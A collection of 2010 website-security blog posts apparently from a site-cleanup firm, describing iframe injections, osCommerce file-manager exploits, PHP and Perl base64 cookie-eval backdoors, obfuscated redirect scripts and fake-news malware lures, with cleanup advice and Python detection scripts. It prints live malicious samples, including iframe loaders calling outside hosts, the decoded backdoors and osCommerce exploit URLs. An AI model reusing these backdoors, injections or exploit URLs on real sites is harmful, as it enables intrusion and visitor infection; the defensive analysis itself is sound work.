
Nutcountry.ru and Parkperson.ru iframes

Over the past week we’ve been seeing a lot of infected websites that have an iframe that contains one of these two URLs:

  • nutcountry.ru:8080/index.php
  • parkperson.ru:8080/index.php

A little searching found that approximately 25,000 web pages have the nutcountry.ru:8080/index.php iframe and another 516 web pages reference the parkperson.ru:8080/index.php iframe.

What’s interesting is that none of the websites listed in the Google search for either of these two iframes is listed with the “this site may harm your computer” label.

We checked the Google Safe Browsing Diagnostic for nutcountry.ru and it shows:

It appears that Google just listed nutcountry.ru on 8-03-2010, which would explain why the web pages listed in a Google search aren’t showing the warning, “this site may harm your computer”.

And for parkperson.ru we found this:

parkperson.ru Google Safe Browsing Diagnostic page

Shows that as of 8-04-2010, Google has not found this site to be harmful or suspicious.

We attempted to download the files from parkperson.ru, and to watch what infection might occur on a visit, and found that the domain does not exist, and neither does nutcountry.ru.

What does all this mean?

It means that over 25,000 websites were infected, but with an iframe that is harmless because the URL inside the iframe doesn’t go anywhere.

The other interesting aspect of this infection is that all the web pages appear to be ASP code (.asp or .aspx). Based on the location of the harmless iframes, it appears to be another ASPROX infection.

If it is ASPROX, you’ll probably see the iframe in your SQL database. Based on the location of where the iframe appears in the web pages, it’s not a simple iframe injection. The iframe is actually buried in your SQL database. This will make it more difficult to remove. You should consult the services of a database administrator or a security company that knows SQL (yes we do!).

The next thing will be to determine how the code was inserted. This type of infection is referred to as SQL injection. This happens when the input from a form or dynamically generated web page isn’t properly sanitized. If there’s a code plugin you’re using, or you’re utilizing some standard software package in your .ASP code, please check for security updates. If you’ve had a programmer create something for you, contact them and have them check over all the code they created for you. Somewhere on your site you have a SQL injection vulnerability and it needs to be closed.

As stated, this time, the domains included in the iframe don’t exist. However, the next time, your visitors could get infected and your site could be blacklisted by Google and many other services.

If you need assistance with this, please send me an email at traef@wewatchyourwebsite.com.

If you have other information about this infection, please post it as a comment.

Thank you.

osCommerce v2.2 Website Infections

During the past 10 days we started seeing a number of websites using osCommerce v2.2 being infected.

The infection usually included some randomly named folder with a list of files in them. Some of the folder names we’ve seen include:

  • catalog
  • feeds
  • image
  • scripts
  • items
  • rss
  • inventory
  • visual

The names are common, but are randomly selected by the hacker infecting the website.

Inside the folder are various files, some .html some .php – all no good.

There is usually at least one file that starts with:

set_time_limit(9999999);

This file actually looks for files with one malscript already injected and replaces it with a newer malscript.

For instance, some of them look for:

hxxp://nt002.cn/E/J.JS

and replace it with:

hxxp://nt02.co.in/3

It appears to place these malscripts immediately after the closing body tag.

Frequently we’ve also found various backdoor (shell script) files.

These backdoors look for any .conf files (configuration files) especially from:

  • httpd.conf
  • vhosts.conf
  • proftpd.conf
  • psybnc.conf
  • my.conf
  • all .conf files
  • all .pwd files
  • all .sql files
  • all .htpasswd files

Armed with this information, the attacker now has complete control over the website.

How to prevent this?

We’ve found a number of exploits available. One of them is a file disclosure vulnerability which means that the attacker can view files on the website.

One of the URLs follows this scheme:

hxxp://[site]/[path]/admin/file_manager.php/login.php?action=download&filename=/include/configure.php

This particular URL would show the attacker the configure.php file. There is no patch, that we know of yet, that prevents this attack. The best advice we’ve seen is to rename the admin folder something obscure so the hackers can’t just scan your site with this URL and find the file_manager.php file.

Other exploits we’ve seen use the same basic URL but the action variable is set as follows:

admin/file_manager.php/login.php?action=save

This is followed by a URL to a remote site that stores a backdoor shell script. This backdoor then gets saved to the website. All a hacker has to do is to access the URL:

hxxp://[site]/osCSS/[name of shell script backdoor].php

and they have remote access to the site.

Again, if the admin folder is renamed to something obscure, this attack won’t work. This type of protection is aptly named, “security by obscurity” because all you’re doing is hiding the folder from the attacker, but until an official patch is released, this seems to be the best advice.
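As an added example (not code from osCommerce or from the original post), the following Python scans a web server access log for the file_manager.php/login.php requests described above and reports, per client address, which actions were tried and which ones the server answered with 200. The log lines are constructed, and the Apache combined log format is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (documentation IP ranges), Apache combined format.
SAMPLE_LOG = """\
198.51.100.7 - - [02/Aug/2010:10:01:11 +0000] "GET /catalog/admin/file_manager.php/login.php?action=download&filename=/include/configure.php HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
198.51.100.7 - - [02/Aug/2010:10:01:40 +0000] "POST /catalog/admin/file_manager.php/login.php?action=save HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.20 - - [02/Aug/2010:10:05:02 +0000] "GET /catalog/admin/file_manager.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.99 - - [02/Aug/2010:10:09:53 +0000] "GET /shop/admin/file_manager.php/login.php?action=download&filename=/include/configure.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"
192.0.2.44 - - [02/Aug/2010:10:12:00 +0000] "GET /catalog/index.php HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
# file_manager.php with /login.php appended as trailing path info, as in the
# URLs quoted in the post. The admin folder name is deliberately not fixed.
PROBE_PATH_RE = re.compile(r"/file_manager\.php/login\.php$", re.IGNORECASE)


def find_probes(log_text):
    """Return one record per request that matches the URL scheme from the post."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not PROBE_PATH_RE.search(unquote(url.path)):
            continue
        query = parse_qs(url.query)
        hits.append({
            "ip": m["ip"],
            "when": m["when"],
            "method": m["method"],
            "action": query.get("action", [""])[0],
            "filename": query.get("filename", [""])[0],
            "status": int(m["status"]),
        })
    return hits


def summarise(hits):
    """Group hits by client; 'answered_200' lists requests the server served."""
    report = defaultdict(lambda: {"actions": set(), "answered_200": []})
    for hit in hits:
        entry = report[hit["ip"]]
        entry["actions"].add(hit["action"])
        if hit["status"] == 200:
            entry["answered_200"].append((hit["action"], hit["filename"]))
    return dict(report)


if __name__ == "__main__":
    for ip, entry in summarise(find_probes(SAMPLE_LOG)).items():
        print(ip, sorted(entry["actions"]), entry["answered_200"])
```

A 200 answer to action=download means configure.php should be treated as disclosed, and a 200 answer to action=save means the site needs a search for newly written .php files. A 404 on the old admin path is what the folder rename is expected to produce.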

If you’ve been attacked by this and have some further information, please post a comment or email me at: traef@wewatchyourwebsite.com

If you need help in cleaning this up and checking for all backdoors on your site, please contact me directly at: traef@wewatchyourwebsite.com

Treasury .gov websites hacked

It was announced by AVG that the websites: bep.gov (Bureau of Engraving and Printing), bep.treas.gov and moneyfactory.gov were injected with a malscript:

<SCR IPT (space added)>
function addCookie(name, value, hours)
{
    var date = new Date();
    date.setTime(date.getTime()+(hours*3600000));
    var expires = "; expires="+date.toGMTString();
    document.cookie = name+"="+value+expires+"; ";
}

document.write('<iframe frameborder="0" onload=\' if (!this.src){ this.src="http://grepad.com/in.cgi?3"; this.height=0; this.width=0;} \'></iframe>');
addCookie("cook", "1", 24);
</SCR IPT (space added)>

According to this webpage: http://news.softpedia.com/news/Department-of-the-Treasury-Website-Rigged-to-Exploit-Visitors-141277.shtml ”Panda analysts speculate that hackers used a common attack technique known as SQL injection, to compromise the U.S. Treasury website. However, other experts think the incident is related to the recent mass compromise at Network Solutions, where the website is hosted. This possibility is enforced by the use of the malicious grepad.com domain in both attacks.”

However, it could also be that someone with FTP access to the website had a virus. The virus steals FTP login credentials and sends them to a server which then infects the websites it has legitimate access to. I see no mention of that possibility. Being that this code was injected after the closing html tag, I doubt very seriously that it’s a SQL injection, possible, but highly unlikely.

Could it have been part of the larger compromise at the hosting provider? Possibly, although last I heard and read, they had cleaned that all up and I know that the first round targeted WordPress blogs, but later repeat attacks targeted all websites at the hosting provider.

 It could have been that these sites were untouched until now? We may never know. But I do know that Network Solutions has always responded quickly to infections and taken responsibility when the “stuff” hits the fan. I have applauded them before and I do so now as well.

 Could this be more finger pointing at someone other than who’s responsible? No, that never happens in the government – does it?

Please leave your comments below…

Thank you.

Attack of mailcheck.php and chat.pl

This attack isn’t anything new, it was used on a number of Italian sites in March 2010, but we’ve been seeing more of it infecting websites recently so I thought I’d elaborate.

Quite often when scanning or cleaning infected websites, when we see the mailcheck.php file, we also see the chat.pl file but that isn’t cast in stone. However, we have not seen chat.pl by itself. In other words, mailcheck.php can appear by itself, but chat.pl does not – at least from what we’ve seen.

The mailcheck.php file usually contains this code:

<?php eval(base64_decode('aWYoaXNzZXQoJF9DT09LSUVbIlBIUFNFU1NJSUQiXSkpe2V2YWwoYmFzZTY0X2RlY29kZSgkX0NPT0tJRVsiUEhQU0VTU0lJRCJdKSk7ZXhpdDt9')); echo "checking email…";?>

Which deobfuscates to:

if(isset($_COOKIE["PHPSESSIID"])){eval(base64_decode($_COOKIE["PHPSESSIID"]));exit;}

The chat.pl file is programmed in Perl and looks like:

#!/usr/bin/perl
use MIME::Base64 ();
eval MIME::Base64::decode("JGMgPSAkRU5WeyJIVFRQX0NPT0tJRSJ9O0BjID0gc3BsaXQgLzsvLCAkYztmb3JlYWNoICRhIChA\nYyl7JGEgPX4gbS9QSFBTRVNTSUlEPSguKikvO2lmIChsZW5ndGgoJDEpID4gMCkge2V2YWwgTUlN\nRTo6QmFzZTY0OjpkZWNvZGUoJDEpO2RpZSAiIjt9fQ==");
$P = "Lf'njItkk";
$WinNT = 0;
$NTCmdSep = "&";
$UnixCmdSep = ";";
$CommandTimeoutDuration = 120;
$ShowDynamicOutput = 1;

As you can see, this code also uses the base64 decoding even though it’s written in Perl. Same strategy, different programming language.

With the infection of mailcheck.php and/or chat.pl, we’ve seen a number of .php and sometimes even .html files that have some PHP code inserted across the top of the file that looks like:

<?php ob_start(‘security_update’); function security_update($buffer){return $buffer.’<script language=”javascript”>function t()…

Blender type website infections

We’ve been seeing a lot of recent website infections that use highly obfuscated javascript code that decodes to a domain: yourblenderparts.ru:8080.

Many other domains are used as well such as:


The infectious code we found was at the bottom of index.php files obviously with the <script></script> tags and generally the same code was found at the bottom of various .js (javascript) files without the script tags.

In the obfuscated code there’s usually a number of strings that look like:

if (a!='' && a='b'){a=null}

There are of course variances to this. The variable ‘a’ can be any letter or even an underscore “_” and may consist of two letters either upper or lowercase.  The variable ‘b’ can be any letter or underscore and can actually be one or two characters and may or may not be uppercase. Other than that, they’re exactly the same. :)

This format will be found in the malscript in a number of places but obviously with different variables.

The string of characters that all this code works on can be in hex format, for instance:

var I="\x68\x74\x74\x70\x3a\x2f\x2f…" (which is actually "http://")

or it might be something like:

var M="hOtFtOp:O/O/…" (which, when you remove the uppercase characters, is actually "http://")

In the obfuscated malscript there is also a number of variable declarations. You’ll find things like:

  • var vM=new Array()
  • var j=new String() (sometimes with a value inside the parenthesis)
  • var Z=window
  • var K=new Date()
  • var G=new RegExp(…)
  • var QF=document

When I see a variable declaration like: var Z=window or var QF=document, I know that somewhere in the malscript I’ll see something like: Z.location or QF.write. This is a common obfuscation technique of the hackers.
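As an added example (not taken from the original post or from any of the malscripts), the Python below applies the two string encodings and the window/document aliasing described above to a script and reports the URLs and the aliased calls it recovers. The sample script and the example.invalid host are constructed; nothing in the input is executed.

```python
import re

# Constructed sample in the style described above; example.invalid is a placeholder.
SAMPLE_JS = r"""
var Z=window;var QF=document;
var I="\x68\x74\x74\x70\x3a\x2f\x2f\x65\x78\x61\x6d\x70\x6c\x65\x2e\x69\x6e\x76\x61\x6c\x69\x64\x3a\x38\x30\x38\x30\x2f";
var M="hOtFtOp:O/O/eQxRaWmTpPlKeZ.MiLnVvBaKlJiHdG/";
QF.write(I);Z.location=M;
"""

STRING_VAR_RE = re.compile(r'\bvar\s+(\w+)\s*=\s*"((?:[^"\\]|\\.)*)"')
ALIAS_RE = re.compile(r'\bvar\s+(\w+)\s*=\s*(window|document)\b')
URL_RE = re.compile(r'^https?://', re.IGNORECASE)


def decode_hex_escapes(text):
    """Turn \\xNN escapes, kept as literal text in the source, into characters."""
    return re.sub(r'\\x([0-9a-fA-F]{2})', lambda m: chr(int(m.group(1), 16)), text)


def strip_uppercase_filler(text):
    """Drop A-Z, the filler characters in the second encoding shown above."""
    return re.sub(r'[A-Z]', '', text)


def recover_url(literal):
    """Return the URL hidden in a string literal, or None if there is none."""
    if URL_RE.match(literal):
        return None  # already readable, nothing was hidden
    hex_decoded = decode_hex_escapes(literal)
    candidates = (
        hex_decoded,
        strip_uppercase_filler(literal),
        strip_uppercase_filler(hex_decoded),
    )
    for candidate in candidates:
        if URL_RE.match(candidate):
            return candidate
    return None


def triage(js):
    """Report hidden URLs, window/document aliases and where the aliases are used."""
    urls = {}
    for name, literal in STRING_VAR_RE.findall(js):
        url = recover_url(literal)
        if url:
            urls[name] = url
    aliases = dict(ALIAS_RE.findall(js))
    uses = set()
    for alias, target in aliases.items():
        for member in re.findall(r'\b' + re.escape(alias) + r'\.(\w+)', js):
            uses.add(f"{alias}.{member} -> {target}.{member}")
    return {"urls": urls, "aliases": aliases, "alias_uses": sorted(uses)}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_JS).items():
        print(key, value)
```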

In all the cases we’ve worked on with this type of infection, it’s been the result of a virus that has stolen the FTP passwords from a PC with FTP access to the website.

We’ve written about this before, but here are the steps to follow to prevent this from happening again.

  1. Install a new anti-virus program. The reason is that it’s obvious that the current anti-virus software didn’t detect anything. Often times these viruses “learn” how to evade detection from the currently installed anti-virus software. Therefore, something new and different is needed to find and remove it. Many have had good results with one of the following: Kaspersky, Avast or Vipre (Sunbelt Software).
  2. Change all FTP passwords. I recommend creating a new FTP account for everyone or for every PC that will be accessing the website. Then be sure that FTP logging is activated. This is important. If your website gets infected again, you can look in the logs to see who has the virus. If there’s a user named john and his username shows up in the logs from somewhere across the world, you can safely assume that it’s his username that’s been compromised.

That’s it. 2 steps. It’s easier to prevent your site from being infected than it is to recover from an infection.
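As an added example (not part of the original post), the Python below shows the log check from step 2: with one FTP account per person, any transfer by an account from an address that person does not normally use stands out. It assumes the server writes the xferlog format used by servers such as ProFTPD; the log lines and the table of known addresses are constructed.

```python
from collections import defaultdict

# Constructed xferlog-format lines (documentation IP ranges), one transfer each.
SAMPLE_XFERLOG = """\
Mon Apr 19 09:12:44 2010 1 192.0.2.10 5120 /public_html/about.html a _ i r john ftp 0 * c
Mon Apr 19 23:51:03 2010 1 203.0.113.77 18211 /public_html/index.php a _ i r john ftp 0 * c
Mon Apr 19 23:51:05 2010 1 203.0.113.77 902 /public_html/js/menu.js a _ i r john ftp 0 * c
Tue Apr 20 08:30:10 2010 2 192.0.2.25 40960 /public_html/img/logo.png b _ i r mary ftp 0 * c
Tue Apr 20 08:31:00 2010 1 203.0.113.77 1200 /public_html/index.php a _ o r john ftp 0 * c
"""

# Hypothetical baseline: the addresses each FTP account normally connects from.
KNOWN_ADDRESSES = {"john": {"192.0.2.10"}, "mary": {"192.0.2.25"}}

DIRECTIONS = {"i": "uploads", "o": "downloads"}


def parse_xferlog_line(line):
    """Parse one xferlog line; fields are counted from both ends so that a
    file name containing spaces does not shift the user name."""
    tokens = line.split()
    if len(tokens) < 18:
        return None
    return {
        "when": " ".join(tokens[0:5]),
        "remote_host": tokens[6],
        "filename": " ".join(tokens[8:-9]),
        "direction": tokens[-7],  # i = incoming (upload), o = outgoing (download)
        "username": tokens[-5],
        "status": tokens[-1],     # c = complete, i = incomplete
    }


def unfamiliar_transfers(log_text, known):
    """Return {user: {address: {"uploads": [...], "downloads": [...]}}} for every
    transfer made from an address that is not in the user's known set."""
    report = defaultdict(lambda: defaultdict(lambda: {"uploads": [], "downloads": []}))
    for line in log_text.splitlines():
        record = parse_xferlog_line(line)
        if record is None or record["direction"] not in DIRECTIONS:
            continue
        if record["remote_host"] in known.get(record["username"], set()):
            continue
        bucket = DIRECTIONS[record["direction"]]
        report[record["username"]][record["remote_host"]][bucket].append(record["filename"])
    return {user: dict(addresses) for user, addresses in report.items()}


if __name__ == "__main__":
    for user, addresses in unfamiliar_transfers(SAMPLE_XFERLOG, KNOWN_ADDRESSES).items():
        for address, files in addresses.items():
            print(user, address, files)
```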

If you have more domains to add to this or would like to comment, please do so. You can leave a comment below or you can email direct at traef@wewatchyourwebsite.com

Until next time…

The recent "Movie Review" infections

Over the past week, we’ve been seeing a lot of infected websites that are ranking for various movie review web pages – and these sites have nothing to do with movies!

The typical infection is a five letter .php file such as:

  • juqip.php
  • kirqf.php
  • wxtrg.php
  • mtywo.php
  • tijox.php

And other file names. The common denominator here is the five letter file name. From what we’ve seen the file name doesn’t start with a vowel and it appears there is a different file name for each website. If you were to Google tijox.php you’ll only see it on one website.

For each of these sites, there is a folder named “./files”. The reason for the dot before the folder name is to hide it from many programs. For instance, in the FTP program I use, WS_FTP by Ipswitch, you have to specify that you want to see all listings that begin with a dot. By default, in WS_FTP, this folder won’t even show. The same is true for Linux. You won’t see the folder that begins with a dot.

All the files in the “./files” folder are put there by the hackers. The majority of them are movie reviews, but there’s also .html files in there about the Buffalo Sabres hockey team, various “Lord of War” files, Texas Lottery Pick 3 and various other frequently searched terms.

We have seen a lot of them using search terms that reference “lord of war”, but other search terms used are:

  • 3 10 To Yuma Soundtrack
  • death of a cheerleader wiki
  • tx lottery pick 3
  • sabres hockey
  • strike force results hershel walker
  • strike force nashville presale code
  • kesha snl
  • strangers on a train movie
  • knights templar
  • freshman fall imdb
  • dazed and confused cast
  • strangers on a train patricia highsmith
  • luci baines johnson pictures
  • bernadette protti pictures
  • dan henderson vs jake shields fight video
  • kelly pavlik news
  • the good shepherd imdb
  • acm awards 2010 voting
  • doctor who victory of the daleks download
  • dazed and confused lyrics
  • amstel gold race 2010
  • roma airport
  • farley granger imdb
  • tao las vegas
  • mastiff
  • josh selby basketball
  • king mo vs mark kerr
  • pavlik vs martinez undercard
  • american bulldog
  • kelly pavlik vs miguel espino
  • kelly pavlik wiki
  • sergio martinez next fight
  • joe mather girlfriend
  • batman and robin comic
  • bernadette protti
  • guillain barre syndrome wikipedia
  • shake weight reviews does it work
  • strikeforce results january 30
  • the hitcher movie
  • psn code generator
  • amanda peterson photos
  • elearning
  • tea leoni
  • patrick dempsey
  • unemployment
  • and many, many others

However, the really interesting information is in the query string. The query string has the “?” after the .php file name, and then it uses a variety of identifiers. Sometimes it’s a single letter; other times we’ve seen words like:

  • sell
  • in
  • post
  • off
  • do
  • topic
  • page
  • pageid
  • go

These are followed by the search term. In the search term the spaces are converted to %20, possibly to further try and obfuscate their work.

We found that the majority of sites with this infection have already been found by Google and labeled, “this site may harm your computer”. Unfortunately not all of them have been flagged yet. I say unfortunately, because it seems as though that’s the way most website owners or webmasters find out that a website has been infected – by Google flagging it and sending an email to the email addresses listed in the Google Webmaster Tools.

If you were to Google, “the hitcher movie”, many listings appear that have the warning this site may harm your computer. Some don’t. Anyone looking to find information about “the hitcher movie” might click on one of the sites that hasn’t been labeled by Google yet and here’s what would happen.

First, inside the “./files” folder, there is typically a file named “b.log”. This file contains the website that these files redirect to when clicked on only from a Google Search Results Page (SERP).

For instance in one investigation the b.log file looked like this:

kqx7ea.xorg.pl|1271657010

Anyone clicking on a Google SERP for this particular website would be directed to:

http://kqx7ea.xorg.pl/in.php?t=cc&d=18-04-2010_x_1816&h=kdsproductions.com&p=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26rlz%3D1T4GPTB_enUS290US290%26q%3Dthe%2Bhitcher%2Bmovie%26start%3D10%26sa%3DN http://kdsproductions.com/ekctj.php?p=the%20hitcher%20movie

Which then redirects to:

http://www4.nomikals2.com/?p=p52dcWltbV%2FRlsijZFaZp29e2KHObWOXk5ecmmFoZG6a http://kqx7ea.xorg.pl/in.php?t=cc&d=18-04-2010_x_1816&h=kdsproductions.com&p=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26rlz%3D1T4GPTB_enUS290US290%26q%3Dthe%2Bhitcher%2Bmovie%26start%3D10%26sa%3DN

Which redirects to:

http://www2.scanprotection34p.net

Which wants to install a fake (rogue) anti-virus program on your PC.

What to look for

Look in your root folder for your website. It might be public_html or just html. Look for any .php files that have five letters that look totally random. From what we can tell, they are totally random. Then make sure that your FTP software is showing hidden files and folders. Look for a folder named “files” and see if there aren’t a whole lot of .html files in there that you’re quite certain, you didn’t put there.

What to do

If you do find these instances on any of your websites, remove the ./files folder and the five letter randomly named .php file. There may also be .php files installed in your images folders. Search all files for the string:

eval(base64_decode( followed by a long list of characters. Don’t just delete this file, but examine it. If you need help decoding it, please email at: traef@wewatchyourwebsite.com
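As an added example (not the author's tooling), the Python below runs the checks from “What to look for” and “What to do” over a local copy of a site: five-letter .php names, the hidden folder, b.log, and eval(base64_decode( blobs, which it decodes without executing and labels when they match the cookie-driven pattern shown for mailcheck.php earlier on this page. It assumes the hidden folder is literally named .files; the sample tree is constructed, apart from the mailcheck.php line quoted above.

```python
import base64
import os
import re
import tempfile

# Matches eval(base64_decode('...')); the blob is only decoded, never executed.
EVAL_B64_RE = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*[\'"]([A-Za-z0-9+/=\s]+)[\'"]')
# Five lowercase letters, first one not a vowel (juqip.php, tijox.php, ...).
# Legitimate names such as login.php also match, so hits are review candidates.
RANDOM_PHP_RE = re.compile(r"^[b-df-hj-np-tv-z][a-z]{4}\.php$")
TEXT_EXTENSIONS = (".php", ".html", ".htm", ".js")
# The mailcheck.php line quoted earlier on this page, reused as sample input.
MAILCHECK_LINE = (
    "<?php eval(base64_decode('aWYoaXNzZXQoJF9DT09LSUVbIlBIUFNFU1NJSUQiXSkpe2V2YWwo"
    "YmFzZTY0X2RlY29kZSgkX0NPT0tJRVsiUEhQU0VTU0lJRCJdKSk7ZXhpdDt9')); "
    "echo \"checking email...\";?>")


def decode_payloads(text):
    """Statically decode each eval(base64_decode('...')) blob found in text."""
    decoded = []
    for blob in EVAL_B64_RE.findall(text):
        try:
            decoded.append(base64.b64decode("".join(blob.split())).decode("latin-1"))
        except ValueError:
            decoded.append("<undecodable base64>")
    return decoded


def scan_site(root):
    """Return sorted (kind, relative path, detail) findings for a local site copy."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        def rel(name):
            path = os.path.relpath(os.path.join(dirpath, name), root)
            return path.replace(os.sep, "/")
        findings += [("hidden-folder", rel(d), "") for d in dirnames if d == ".files"]
        for name in filenames:
            if RANDOM_PHP_RE.match(name):
                findings.append(("five-letter-php", rel(name), ""))
            full = os.path.join(dirpath, name)
            if name == "b.log":
                # First field of "host|number" is the redirect host, as in the post.
                with open(full, encoding="latin-1") as fh:
                    host = fh.readline().strip().partition("|")[0]
                findings.append(("redirect-target", rel(name), host))
            if name.lower().endswith(TEXT_EXTENSIONS):
                with open(full, encoding="latin-1") as fh:
                    for payload in decode_payloads(fh.read()):
                        cookie_fed = "COOKIE" in payload and "eval" in payload
                        kind = "cookie-eval-backdoor" if cookie_fed else "encoded-eval"
                        findings.append((kind, rel(name), payload))
    return sorted(findings)


def build_sample_site(root):
    """Constructed sample tree carrying the indicators described on this page."""
    files = {
        "index.php": "<?php echo 'home'; ?>",
        "tijox.php": "<?php /* constructed placeholder */ ?>",
        ".files/b.log": "redirector.example.invalid|1271657010\n",
        ".files/the-hitcher-movie.html": "<html>constructed doorway page</html>",
        "images/mailcheck.php": MAILCHECK_LINE,
    }
    for rel_path, content in files.items():
        full = os.path.join(root, *rel_path.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="latin-1") as fh:
            fh.write(content)


def demo():
    """Build the sample tree in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_site(root)
        return scan_site(root)


if __name__ == "__main__":
    for kind, path, detail in demo():
        print(f"{kind:22} {path:32} {detail}")
```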

In all our cases, we’ve found that the culprit was a virus on a PC with FTP access to the infected website. We’ve seen the FTP logs and we’ve identified the IP addresses that some of these files came from.

As with many website infections, the first step is change all FTP passwords and do not save them on any PC – yet.

Then obviously remove all the files identified above.

Next, install a different anti-virus program on your PC. The reason is that these viruses and trojans know how to evade detection of the anti-virus program that’s already been installed when the virus first infected the PC. In order to find and remove the viruses you have to install a different anti-virus program.

Many have had good success with one of the following: Kaspersky, Avast or Vipre (Sunbelt Software). If you’re already using one of these, then try one of the other two – it has to be different.

Once you’ve found and removed the virus or trojan, you can then use your FTP program with the new passwords and feel safe.

The last thing to do is to Request a Review from your Google Webmaster Tools – if your site has been tagged with the warning this site may harm your computer.

All of our clients prevented this warning by our monitoring service. While we couldn’t prevent their PCs from getting infected, we could detect when their websites changed. We immediately removed the files and alerted them to take the above steps to clean their PCs. Their websites were never blacklisted by Google because of our automated cleaning process.

If you’d like to be protected, please send me an email: traef@wewatchyourwebsite.com

If you have any comments, please feel free to register and let me know your thoughts or experience with this type of infection.

Attack of the binglbalts

We started seeing a lot of websites infected with a malscript that looks like:

iframe frameborder="0" onload=' if (!this.src) { this.src="http://binglbalts.com/grep/"; this.height=0; this.width=0; } '>/iframe

In Joomla sites we’ve found it in /templates/index.php toward the bottom. In WordPress blog sites, we’ve seen it in the footer.php file.

We’ve usually been finding them toward the bottom of webpages. As of this writing the binglbalts.com domain is still active.

It turns out these infections have been the result of stolen FTP credentials. We’ve been able to view the logs of numerous sites that have been hacked by binglbalts.com and we can see the IP addresses of where the infection is coming from.

To clean this, first change all FTP passwords.

Second, you’ll have to download your entire site onto your PC or Mac. Then use grepWin and use this as the search string:

iframe\s*frameborder=\"0\" onload=\' if \(\!this\.src\)\s*\{\s*this\.src=\"http:\/\/binglbalts\.com\/grep\/\"; this\.height=0; this\.width=0;\s*\} \'>

Bill Cosby is not dead – Right

On Sunday, as my wife was on the Internet she told me that she had seen online where people were claiming that Bill Cosby had passed away.

Me, being the skeptic that I am, immediately jumped on-line and started scanning the listings from a Google search about Bill Cosby is dead. I know when I hear terrible news like this coming only from on-line sources, that it might be a hoax. Consider my posting about the hoax of Johnny Depp dying in a car crash http://www.wewatchyourwebsite.com/wordpress/?p=321. The hackers seem to create their own news when none exists.

With the Bill Cosby news (or non-news), I found that a number of people used Twitter to spread the news, which got some buzz going. People were blogging about it and comments were posted like: “I’ll miss him.” which just drives the Google Trends and Yahoo! Buzz through the roof.

As I’ve said before, cybercriminals know the game maybe better than most of us – and they play it well.

As far as the websites that were first reporting on this, one of them was another CNN look-a-like similar to the Johnny Depp scenario. Only this time the website itself was attempting a drive-by infection. At times the drive-by seemed to be seeking Internet Explorer 6 visitors. Other times during the day it was just redirecting to various infectious websites where the mother-lode of infection code was hiding.

The only safe way to check out any “news stories” you hear about is to go directly to your favorite news website and search for the item of interest. That way, you’re limiting your exposure.

Just thought you’d like to know…

Hackers earn $1,000 per PC

In research conducted by Kaspersky Lab, Dmitry Bestuzhev claimed, “When the value of stolen credit cards and other types of credentials are added up, hackers can easily take in $1,000 worth of data from just one hacked computer.”

Quite often I’m asked, “Why do hackers hack?”

I’ve always responded with various examples of how the hackers (cybercriminals) make money. Many often think that it’s just stolen credit cards, however, in the last year, I’ve seen the tide moving away from just credit cards to various other forms.

For instance, do a Google search on “pay per install” and you’ll find an entire underground where people are paid for installing “crapware”. This is software that doesn’t really add any functionality for the end-user. What it does do is provide the people paying the hackers a way to make money from displaying ads or in some cases, for remotely controlling the PC.

Hackers also use infected PCs to send SPAM. Don’t think SPAM sells any products? Do you think that as valued as a compromised PC is to hackers, they’d risk being eliminated if it didn’t produce some return?

Obviously statistics aren’t available for what kind of returns they get. Numerous requests for interviews were all declined by those in the hacker communities.

In addition to stolen credit cards, pay per install and SPAM, Bestuzhev has seen Gmail accounts for sale on Russian hacker forums, with asking prices of $82, RapidShare accounts going for $5 per month, as well as Skype, instant messaging and Facebook credentials also being offered. He recently witnessed one offer to buy a hacked Twitter account for about $1,000. The particular Twitter account had 320 followers.

Now there’s a new Internet Marketing strategy – build up a quick Twitter following then sell it to hackers.

For those who are always wondering why hackers hack, it’s because they make money – lots and lots of money.

As our focus is website security, imagine why they want to infect so many PCs with their drive-by downloads. With so many people having Twitter accounts, is it any wonder why they want your website?

Think about the numbers. If the hackers are willing to pay $1,000 for a Twitter account with only 320 followers, imagine how much they can make off of that. The hackers know numbers. They know that if something costs them $1,000, it must be able to generate at least 10 – 20 times that. It’s all about risk versus reward.

How would you know if your PC is hacked? Would you know if your Twitter or Facebook account were hacked? How many people could be infected from your: Twitter page, Facebook site or website?

I just thought that those of you who follow me on this blog, might want to know.

An educated website owner is the best kind.

Let me know your thoughts or comments on this.

Johnny Depp is definitely not dead

I read recent reports about how the famous actor Johnny Depp died in a car crash – this is a scam!

I guess the cybercriminals didn’t get enough traffic out of luring the soft-hearted to fake “Save Haiti” websites so they created their own high-traffic story.

Oh don’t worry. Unlike many of the cybercriminal schemes where just visiting a website will attempt a barrage of PC infections, this one lures you into wanting to download their “mother lode of infectious code.”

As of Sunday January 24, 2010, the search term: johnny depp car crash, was searched over 13 million times. It was even a trendy topic on Twitter which helped add fuel to the fire.

Like I’ve stated before, hackers or cybercriminals, whichever you prefer, know how the human mind works. They know we initially read a story, then if there’s pictures or better yet – a video, we’re going the distance for the full effect.

If you Google, johnny depp car crash, you’ll see one listing from CNN. This might lead you to believe that this story is true. If CNN covers it, it must be true. However, clicking on the link to the “CNN” story, will take you to a website that looks like CNN, but it’s not.

The site simply whets your appetite for blood and guts.

After reading that story, you’ll probably want to see some of the videos taken of the car crash. Maybe you can see the famed actor dead on the ground or something almost as gruesome. So your next search is for videos of the Johnny Depp car crash.

Many sites were offering those.

Unfortunately, or fortunately, you couldn’t watch the video unless you had the correct video software – and you could download it right there, if you really, really wanted to watch the video.

BAM!

They got you. The video software (codec) wasn’t really going to let you view the video. What it was going to do was let the hacker have access to your PC – whenever they wanted it.

